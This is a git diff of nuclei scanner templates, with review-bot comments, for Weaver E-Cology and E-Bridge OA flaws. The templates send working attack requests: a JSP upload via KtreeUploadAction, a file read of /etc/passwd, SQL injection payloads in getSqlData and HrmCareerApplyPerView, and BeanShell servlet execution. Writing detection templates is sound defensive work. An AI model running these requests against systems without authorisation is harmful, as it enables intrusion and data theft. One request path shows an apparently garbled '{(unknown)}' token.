@@ -1,53 +0,0 @@ -id: weaver-e-cology-ktreeuploadaction-arbitrary-file-upload - -info: - name: weaver e-cology KtreeUploadAction arbitrary file upload - author: SleepingBag945 - severity: critical - description: 泛微E-Cology存在文件上传漏洞,攻击者可以通过KtreeUploadAction.jsp上传任意文件并且进一步进行利用 - reference: - - https://buaq.net/go-117479.html - tags: ecology,upload,fileupload,intrusive - -http: - - raw: - - | - POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib - Accept-Encoding: gzip - - ------WebKitFormBoundarywgljfvib - Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp" - Content-Type: image/jpeg - - <%out.print(43997 * 41858);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> - ------WebKitFormBoundarywgljfvib-- - - - | - GET {(unknown)} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: filename - internal: true - group: 1 - regex: - - "','url':'(.*?)','title" - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1,'original')" - - "contains(body_2, '1841626426') && status_code_2 == 200" - condition: and - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml new file mode 100644 index 0000000000..4a34c16335 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml 
@@ -0,0 +1,50 @@
+id: weaver-ebridge-lfi
+
+info:
+ name: Weaver E-Bidge saveYZJFile - Local File Read
+ author: SleepingBag945
+ severity: high
+ description: |
+ There is an arbitrary file reading vulnerability in the Weaver OA E-Bridge saveYZJFile interface. An attacker can read any file on the server through the vulnerability.
+ reference:
+ - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: eBridge_JSessionid
+ fofa-query: app="泛微云桥e-Bridge"
+ tags: eBridge,weaver,oa,lfi,lfr,intrusive
+
+http:
+ - raw:
+ - |
+ GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl={{path}} HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /file/fileNoLogin/{{idname}} HTTP/1.1
+ Host: {{Hostname}}
+
+ attack: pitchfork
+ payloads:
+ path:
+ - file:///C:/&fileExt=txt
+ - file:///etc/passwd&fileExt=txt
+
+ stop-at-first-match: true
+ skip-variables-check: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
+ - "status_code_2 == 200 && contains(header_2, 'filename=')"
+ - "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"
+ condition: and
+
+ extractors:
+ - type: regex
+ name: idname
+ internal: true
+ group: 1
+ regex:
+ - '"id":"(.*?)"'
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
similarity index 58%
rename from http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml
rename to http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
index 8c56b4036a..8e5c6d62c7 100755
--- a/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
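Review bot: `max-request: 1` is wrong for this template: it has two raw requests and a two-entry `payloads.path` list under `attack: pitchfork`, so up to four requests go to each target (`max-request: 4`). `name:` misspells the product — `E-Bidge` should be `E-Bridge`. In the DSL, the first and third lines use the bare `body` (`tolower(body)`, `regex('root:.*:0:0:', body)`) while the neighbouring expressions index `body_1`/`body_2`; in a multi-request template it is not obvious which response the bare name refers to, so index them explicitly (`body_1` for the error check, `body_2` for the passwd regex) to match the rest of the matcher.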
@@ -1,10 +1,16 @@ -id: weaver-e-cology-bshservlet-rce +id: weaver-ecology-bshservlet-rce info: - name: Weaver E-Cology BeanShell Remote Command Execution + name: Weaver E-Cology BeanShell - Remote Command Execution author: SleepingBag945 severity: critical - description: Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + description: | + Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + metadata: + max-request: 1 + verified: true + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" tags: beanshell,rce,weaver http: @@ -16,7 +22,6 @@ http: bsh.script=print%28%22{{randstr}}%22%29%3B - - raw: - | # bypass waf POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} @@ -26,15 +31,12 @@ http: matchers-condition: and matchers: - - type: word - words: + - type: regex + regex: - "BeanShell Test Servlet" - - type: word - words: - - "{{randstr}}" + - "(?i)
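Review bot: `max-request: 1` in the newly added metadata undercounts: the file has two raw requests (the plain `POST /weaver/bsh.servlet.BshServlet` and the `# bypass waf` variant visible in the next hunk), so it should read `max-request: 2`. The shodan/fofa queries match the other weaver-ecology templates in this commit, which is good for consistency.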
(\n.*){{randstr}}"
+        condition: and
 
       - type: status
         status:
-          - 200
-
-# Enhanced by cs on 2022/07/05
+          - 200
\ No newline at end of file
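Review bot: This hunk drops the file's trailing newline (`\ No newline at end of file`), and the same happens in weaver-ecology-getsqldata-sqli.yaml, weaver-ecology-hrmcareer-sqli.yaml, weaver-ktreeuploadaction-file-upload.yaml and several of the sections above; yamllint's `new-line-at-end-of-file` rule flags each of these, so re-add the newline before merging. Switching to a regex matcher with `condition: and` so that both the servlet banner and the `{{randstr}}` echo must be present is the right tightening; since `{{randstr}}` is interpolated into a regular expression, a comment above the entry such as `# randstr is interpolated into the regex; keep it alphanumeric` would record the assumption that makes that safe.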
diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
new file mode 100755
index 0000000000..a852d8407d
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@@ -0,0 +1,39 @@
+id: weaver-ecology-getsqldata-sqli
+
+info:
+  name: Weaver E-Cology `getsqldata` - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
+  reference:
+    - https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: word
+        part: body
+        words:
+          - '{"api_status":'
+          - '"status":true}'
+        condition: and
\ No newline at end of file
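Review bot: The two word matchers have no `matchers-condition`, so nuclei's default OR applies and the second matcher (`{"api_status":` plus `"status":true}`) alone fires the template; if the endpoint returns that success envelope for queries it did not actually run (I cannot tell from the template), the `@@version` path becomes a false-positive source. Either pair the second matcher with content only the `@@version` query would return, or document the OR intent with a comment above `matchers:` such as `# either matcher suffices: md5 echo (path 1) or a successful API envelope (path 2)`. `name:` wraps the endpoint in backticks and lower-cases it, unlike every other name in this commit; `name: Weaver E-Cology getSqlData - SQL Injection`. The description's `Panwei` should be `Weaver`, consistent with `name:`.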
diff --git a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
new file mode 100755
index 0000000000..b4114c2f61
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
@@ -0,0 +1,35 @@
+id: weaver-ecology-hrmcareer-sqli
+
+info:
+  name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
+  reference:
+    - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
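Review bot: The description is the weak spot: `obtain sensitive files in the server database` confuses files with data, and `Panwei OA E-Cology` disagrees with the vendor in `name:`; suggest `A SQL injection in HrmCareerApplyPerView.jsp of Weaver E-Cology lets an attacker read data from the backend database.` The md5-word matcher plus the status matcher under `matchers-condition: and` is the same pattern the other rewritten templates use, and `max-request: 1` matches the single path.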
diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
new file mode 100755
index 0000000000..ded95bff68
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
@@ -0,0 +1,57 @@
+id: weaver-ktreeuploadaction-file-upload
+
+info:
+  name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
+  author: SleepingBag945
+  severity: critical
+  description: |
+    There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
+  reference:
+    - https://buaq.net/go-117479.html
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: weaver,ecology,fileupload,intrusive
+
+variables:
+  num1: "{{rand_int(40000, 50000)}}"
+  num2: "{{rand_int(40000, 50000)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
+
+        ------WebKitFormBoundarywgljfvib
+        Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
+        Content-Type: image/jpeg
+
+        <%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+        ------WebKitFormBoundarywgljfvib--
+
+      - |
+        @timeout: 20s
+        GET {(unknown)} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl: 
+          - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
+          - "contains(body_2, '{{result}}') && status_code_2 == 200"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: filename
+        group: 1
+        regex:
+          - "','url':'(.*?)','title"
+        internal: true
\ No newline at end of file
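Review bot: The description says the upload goes through `KtreeUploadAction.jsp`, but the request targets `/weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction`, a servlet with no `.jsp` suffix; drop the extension in the description. `dsl: ` on the matcher carries trailing whitespace and the file ends without a newline, both of which yamllint flags. The second raw request's path reads `{(unknown)}` here (the deleted version shows the same token); if that is not a rendering artifact of `{{filename}}`, the `filename` extractor is never consumed and the `body_2` check cannot succeed. Since the uploaded JSP removes itself (`new java.io.File(...).delete()`), a comment above `variables:` such as `# writes a self-deleting JSP on the target; intrusive` would tell operators what the `intrusive` tag costs.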